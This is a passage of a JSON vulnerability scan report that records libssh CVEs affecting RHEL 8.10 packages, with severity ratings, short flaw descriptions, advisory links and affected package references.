          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        390
      ],
      "description": "A flaw was found in libssh. When ProxyCommand is used, an unchecked fork() failure can be stored as process ID -1; during cleanup, signals may then be sent across the caller's accessible process tree, leading to local denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59845"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59845"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498178"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59845.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59845"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59845"
        }
      ],
      "published": "2026-07-21T12:18:58+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59846",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        78,
        77
      ],
      "description": "A flaw was found in libssh. A malicious username expanded through %r in ProxyCommand handling can inject shell metacharacters, exposing environment variables and causing unintended shell behavior.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59846"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59846"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498179"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59846.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59846"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59846"
        }
      ],
      "published": "2026-07-21T13:17:18+00:00",
      "updated": "2026-08-19T05:17:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59847",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        253,
        1310
      ],
      "description": "A flaw was found in libssh. Incorrect AES-GCM finalization checks in builds using the OpenSSL backend can effectively remove integrity protection, allowing an in-path attacker to modify plaintext on the wire without detection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59847"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59847"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498180"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59847.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59847"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59847"
        }
      ],
      "published": "2026-07-21T14:16:34+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
